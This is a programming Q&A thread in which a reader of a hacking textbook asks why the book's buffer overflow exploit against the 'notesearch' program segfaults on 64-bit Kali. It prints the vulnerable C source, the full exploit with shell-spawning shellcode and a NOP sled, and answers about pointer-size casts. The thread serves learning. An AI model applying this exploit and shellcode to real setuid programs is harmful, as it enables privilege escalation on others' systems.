# Need help understanding buffer overflow and its exploit

Tags: c, buffer-overflow, exploit

I have purchased this book called "Hacking, The Art of Exploitation", and there is a program in it that is a buffer overflow exploit from a program that showed up previously in the book. There are a few issues that I have run into. First of all, if I try to run the program I get a segmentation fault (even though the author ran the same exact commands as I am and he isn't getting any issues) My second issue is that I think that the author did a poor job explaining what exactly going on. I'm confused how this exploit 1) determines the offset value 2) Uses a NOP sled to find the return address (how does this work) 3)  how does the shellcode say what is happening/what does it say/how can i read it.

The code to the program being exploited is:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h" //Just an error checked malloc and an error message/exit function

#define FILENAME "/var/notes"

void fatal(char *);
int print_notes(int, int, char *);
int find_user_note(int, int);
int search_note(char *, char *);

int main(int argc, char *argv[]) {
    int fd, userid, printing = 1;
    char searchstring[100];

    if (argc > 1)
        strcpy(searchstring, argv[1]);
    else
        searchstring[0] = 0;

    userid = getuid();

    fd = open(FILENAME, O_RDONLY);
    if(fd == -1) {
        fatal("in main opening file");
    }

    while(printing) 
        printing = print_notes(fd, userid, searchstring);

    printf("-------[ end of note data ]-------\n");
    close(fd);
}

// A function to print the notes for a given uid that match an optional searchstring 
// Returns 0 at end of file, 1 if still more notes
int print_notes(int fd, int uid, char *searchstring){

    int note_length;
    char byte = 0;
    char note_buffer[100];

    note_length = find_user_note(fd, uid);
    if(note_length == -1) //If end of file reached
        return 0;         // Return 0;

    read(fd, note_buffer, note_length); // Read More Data
    note_buffer[note_length] = 0;       // Terminate the String

    if(search_note(note_buffer, searchstring))  //If searchstring found
        printf(note_buffer);            //Print the note
    return 1;
}   

// A function to find the next note for a given userID
// Returns -1 if the end of the file is reached
// Otherwise, it returns the length of the found note
int find_user_note(int fd, int user_uid) {

    int note_uid = -1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) { // Loop unitl a note for user_uid is found

        if(read(fd, &note_uid, 4) != 4) // Read the uid data
        return -1; // If 4 bytes arent read, return end of file code

        if(read(fd, &byte, 1) != 1) //Read the newline separtor
            return -1;

        byte = length = 0;
        while(byte != '\n') { // Figure out how many bytes to the end of line
            if(read(fd, &byte, 1) != 1) // Read Single byte
                return -1; // If byte isn't read, return end of file code
            length++;
        }
    }

    lseek(fd, length * -1, SEEK_CUR); // Rewind file by reading length bytes

    printf("[DEBUG] found a %i byte note for user id %i\n", length, note_uid);
    return length;
}

//A function to search a note for a given keyword
// Returns 1 if a match is found, 0 if there is no match
int search_note(char *note, char *keyword){

    int i, keyword_length, match=0;

    keyword_length = strlen(keyword);
    if(keyword_length == 0) // If there is no searchstring
         return 1; //Always match

    for(i=0; i < strlen(note); i++){ // Iterate over bytes in note
        if(note[i] == keyword[match]) // If byte matches keyword
            match++;    // Get ready to check nexy byte
        else {
            if(note[i] == keyword[match]) // If byte matches keyword    
                match = 1; // Start the match count at 1
            else        
                match = 0; // Otherwise its zero
        }

        if(match == keyword_length) // If there is a full match
            return 1; // return match
    }
    return 0; // return not matched 
}


The exploit that is included is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

     unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); //Zero out the new memory

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command); // Set buffer at the end

    if(argc > 1) //Set offset
        offset = atoi(argv[1]);

    ret = (unsigned int)&i - offset; //Set return address

    for(i=0; i <160; i+=4) //Fill buffer with return addres
        *((unsigned int *)(buffer + i)) = ret;

    memset(buffer, 0x90, 60); //Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode) -1);

    strcat(command, "\'");

    system(command); //Run Exploit
    free (command);
}
```

Note about that code: I get a warning on the line that assigns the address of i - offset. I'm pretty sure that this is because since I'm using a 64 bit machine, a pointer is 8 bytes while a unsigned int is only 4. To counter this, I typcasted into a long unsigned int. I'm not sure if that is good practice, but correct me when I am wrong.
So what I changed it to is:

> ret = (unsigned int)&i - offset; //Set return address[/code]

I have used gdb to analyze whats going on and I found the segmentation fault to happen during the line

> system(command); // Run Exploit

I also have used gdb to thoroughly examine the memory at the addresses of all variables throught the program and I have noticed that when the author of the book examines the contents of the command variable (while it has the shellcode in it), his output shows a bunch of wacky characters, but mine shows numbers and slashes. Why is there a difference?

My main point is that I don't know is how to stop this segmentation fault from happening but still getting this exploit to work correctly. If someone would be able to help me out that would be great. If anyone needs more information, I would be happy to provide it.

PS- I am running kali linix 64 bit if (if that might help you determine something)

**EDIT** The line that is causing the segmentation fault is:

```
 *((unsigned int*)(buffer+i)) = ret;
```

Comment: `argv[1]` can be arbitary length greater than 100. you'll have to allocate enough space for `strlen(argv[1])`

Comment: @self that is the buffer overflow that is being exploited. I'm not confused about that. I'm more confused about what's going on in the exploit

Comment: The book is originally from 2008, so pointers could likely be considered 4 bytes at the time (even if it's poor assumption/programming), but you may be right in this regard.

Comment: @ringø yea I examined and I'm pretty sure that's the case. but I'm pretty sure I fixed that when I typecasted into long unsigned int. regardless, there is still a segmentation fault in either case

Comment: Are you compiling with debug flags?  Debugging options turn on extra checking at runtime that may trigger the Seg Fault.

Comment: @bruceg I was compiling with the -g flag earlier and i just tried without adding any flags and I still got the segmentation fault

Comment: Maybe compiler technology has advanced since 2008?

Comment: @bruceg I would imagine that is true. I just have to figure out how to fix what's going wrong due to the changes in technology ;)

Comment: You can simulate this issue by having your own larger buffer and make the searchstring variable be a pointer into it.  Then you can see what the buffer overwrite is doing.

Answer (score 0):

You could simulate the buffer overflow with something like this:

```
char big_buffer[10000];
char *searchstring = big_buffer;
char *overflow = big_buffer + 1000;

memset(big_buffer, 0xff, 10000 * sizeof(char));
memset(searchstring, 0, 100);
```

Then watch the overflow area in the debugger to see the overflow.

Answer (score 0):

> I get a warning on the line that assigns the address of i - offset.
>   I'm pretty sure that this is because since I'm using a 64 bit machine,
>   a pointer is 8 bytes while a unsigned int is only 4. To counter this,
>   I typcasted into a long unsigned int. I'm not sure if that is good
>   practice, but correct me when I am wrong. So what I changed it to is:
>
> > ret = (unsigned int)&i - offset; //Set return address

Contrary to what you wrote (*I typcasted into a long unsigned int*), you only typecasted to an `unsigned int`, which is wrong (too short). For such purposes you'd better use (if available) `uintptr_t` from `<stdint.h>`. And note that you must also define `ret` long enough for that.

> The line that is causing the segmentation fault is:
>
> ```
>  *((unsigned int*)(buffer+i)) = ret;
> ```

That's hard to believe (unless this ran on a processor which generates alignment exceptions when storing 4-byte-values), since the addresses written here range from offset 14 to 170 in a 200 bytes allocated memory area. You could show the steps that led you to that conclusion, as well as name the used machine hardware (`uname -m`).

Answer (score 0):

```
ret = (unsigned int)&i - offset; //Set return address
```

change to

```
ret = ((long int) &i) - offset; //Set return address
```

Comment: Welcome to Stack Overflow! Thank you for this code snippet, which might provide some limited, immediate help. A [proper explanation would greatly improve its long-term value](//meta.stackexchange.com/q/114762/206345) by showing _why_ this is a good solution to the problem, and would make it more useful to future readers with other, similar questions. Please [edit] your answer to add some explanation, including the assumptions you've made.